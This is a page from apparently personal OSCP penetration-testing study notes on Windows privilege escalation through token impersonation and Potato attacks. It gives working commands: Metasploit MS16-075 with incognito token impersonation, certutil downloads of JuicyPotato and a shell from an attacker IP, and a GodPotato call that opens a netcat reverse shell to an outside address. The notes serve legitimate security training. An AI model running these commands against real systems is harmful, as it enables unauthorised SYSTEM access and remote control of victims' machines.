OSCP
Linkedin
  • 🐉README - Preperation
  • Proof
  • Services
    • Inital Scans
    • LDAP <tcp 389, 636>
    • DNS <udp 53>
    • FTP <tcp 21>
    • SMB <tcp 445, 139>
    • SNMP <udp 161>
    • MySQL<tcp 3306>
    • MSSQL <tcp 1433>
    • SMTP <tcp 25>
    • POP3 <tcp 110>
    • IMAP <tcp 143>
    • IDENT <tcp 113>
    • WEBDAV
    • SSH <tcp 22>
    • Port Knocking
    • Web Sockets
    • Misc
      • PWNCAT
      • WordPress
      • Keepass
      • Git
      • Site Scraping
  • Web Applications
    • Checklist
    • SQL Injection
      • MySQL Cheatsheet
      • MSSQL Cheatsheet
      • Postgres Cheatsheet
      • Payloads
      • SQLMap
      • Page
    • File Upload
    • Directory Traversal
    • LFI & RFI
      • PHP Wrappers
    • SSRF
    • Command injection
    • XXS
    • APIs
    • PHP Applications
    • Source Code
    • Brute Forcing and Spraying
    • Payloads
    • Compiling Exploits
    • Foothold
    • Node.js
    • Misc
  • Active Directory
    • Checklist
    • Initial Attack Strategy
      • LLMNR Poisoning
      • SMB Relay
      • Shell Acess
      • IPv6 Attacks
      • Kerbrute
      • AS-REP Roasting
      • RPC
      • Passback Attack
      • Misc
    • Post-Compromise Enumeration
      • ldapsearch
      • Ldapdomaindump
      • Bloodhound
        • Attack Paths
      • Plumhound
    • Lateral Movement
      • DCOM
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • LOTL WMI and WinRM
    • Post-Compromise Attacks
      • Kerberoasting
      • Silver Ticket
      • noPac or noCap ?
      • RPC Password Change
      • Mimikatz
      • Knock and Pass Kerberos
      • Dumping and Cracking Hashes
      • Token Impersonation
      • LNK File Attacks
      • GPP / cPassword Attacks
      • AD CS Attacks
      • misc
    • Post-Domain Compromise
      • Dumping the NTDS.dit
      • Golden Ticket Attack
      • Shadow Copies
      • SAM Cleanup
    • Critical Active Directory CVE's
      • Zerologon
      • PrintNightmare
  • Windows Privilege Escalation
    • Checklist
    • Initial Enumeration Manual
      • System Enumeration
      • User Enumeration
      • Network Enumeration
      • Password Hunting
      • AV and Firewall Enumeration
    • Initial Enumeration Automated
      • Methodology > Tools
    • Kernel Exploits
    • DLL Hijacking
    • Service Permissions
      • Binary Paths
      • Unquoted Service Paths
    • Impersonation and Potato Attacks
    • Registy
      • AutoRuns
      • AlwaysInstallElevated
      • Regsvc ACL
    • whoami /priv
      • SeManageVolumePrivilege
      • SeBackupPrivilege
      • SeRestorePrivilege
    • Scheduled tasks
    • xampp
    • Stored Passwords and Port Forwarding
    • RunAs
    • User Switching
    • Executable Files
    • Startup Applications
    • getsystem
    • Windows Subsystem for Linux
    • CVE-2019-1388
    • CVE-2024-26229 (new)
  • Linux Privilege Escalation
    • Checklist
    • Initial Enumeration
      • System Enumeration
      • User Enumeration
      • Network Enumeration
      • Password Hunting
    • Automated tools
    • Kernel Exploits
    • Passwords & File Permissions
      • Passwords
      • Weak File Permissions
      • SSH Keys
    • Sudo
      • Shell Escaping
      • Intended Functionality
      • LD_PRELOAD
      • Simple CTF
      • CVE-2019-14287 (sudo -u#-1 /bin/bash)
      • CVE-2019-18634 (pwfeedback)
    • SUID
      • Vulnversity
    • Capabilities
    • Cron jobs
    • /etc/passwd override
    • NFS Root Squashing
    • Docker
    • Path Variables
    • Groups
      • Disk
      • LXD/LXC
      • mlocate
    • Nginx
    • Misc
      • Wild Cards
      • Abusing scripts
      • Restricted shell escaping
      • Library Hijacking
      • PHP Web Applications
      • FreeBSD
  • Post Exploitation
    • C2
    • AV Evasion
      • Bypassing AMSI
      • Bypassing UAC
      • Disabling Windows Defender
      • Executable Obfuscation
      • Compiling Code
    • Exfiltration
      • Windows - Pickle
      • Mimikatz
    • Pivoting
      • Eumeration
      • Chisel
      • SSHuttle
      • Double Pivot
      • Good to Know
        • Tunneling
        • Plink.exe
        • Port Forwarding via ~C
        • Socat
        • Metasploit
    • File Transfers
    • DNS Tunneling
    • Persistence
    • PGP/ASC
    • Putty
    • Cleanup
  • Cool!
    • Client-side Attacks
      • Code execution via Windows Library
      • Evil Icon
      • ODT Files
    • Custom Wordlists
    • Fixing Exploits
    • Decrypting Secure Strings
    • tmux
    • Random
  • Report Writing
    • Findings Report
    • Common Legal Documents
Powered by GitBook
On this page
  • Token Impersonation Overview
  • Potato Attack Overview
  • Escalation via Potato Attack
  • Manual Juicy Potato Attack
  • Resources
  • Bonus
  • Alternate Data Streams
  1. Windows Privilege Escalation

Impersonation and Potato Attacks

PreviousUnquoted Service PathsNextRegisty

Last updated 8 months ago

Token Impersonation Overview

Potato Attack Overview

Escalation via Potato Attack

After getting a meterpreter shell

background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

Inside of new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

GOD POTATO

godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

dir /r
more hm.txt:root.txt:$DATA
Token impersonation explained
LogoWindows - Privilege Escalation - Internal All The Things
https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
LogoRotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec
Technical Overview
LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub
Other Version
LogoJuicyPotatoHackTricks
LogoIntroduction to Alternate Data StreamsMalwarebytes Labs
HTB Machine Jeeves
High level Overview from foxglovesecurity